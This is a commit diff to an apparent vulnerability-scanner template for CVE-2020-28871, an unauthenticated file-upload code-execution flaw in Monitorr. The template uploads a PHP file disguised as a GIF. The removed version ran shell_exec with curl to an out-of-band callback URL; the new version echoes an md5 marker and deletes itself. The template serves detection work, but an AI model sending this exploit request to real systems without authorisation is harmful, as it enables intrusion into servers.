Update CVE-2020-28871.yaml
parent
6f34cf7a47
commit
1898e69137
|
@ -19,10 +19,7 @@ info:
|
|||
epss-score: 0.96822
|
||||
metadata:
|
||||
max-request: 2
|
||||
tags: unauth,cve,fileupload,monitorr,oast,edb,intrusive,packetstorm,cve2020,rce
|
||||
|
||||
variables:
|
||||
useragent: '{{rand_base(6)}}'
|
||||
tags: unauth,cve,fileupload,monitorr,edb,intrusive,packetstorm,cve2020,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
|
@ -42,7 +39,7 @@ http:
|
|||
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
|
||||
Content-Type: image/gif
|
||||
|
||||
GIF89a213213123<?php shell_exec("curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'");
|
||||
GIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>
|
||||
|
||||
-----------------------------31046105003900160576454225745--
|
||||
|
||||
|
@ -53,13 +50,10 @@ http:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
part: body
|
||||
words:
|
||||
- "http"
|
||||
- "d03c180355b797069cc047ff5606d689"
|
||||
|
||||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: {{useragent}}"
|
||||
|
||||
# Enhanced by mp on 2022/03/27
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue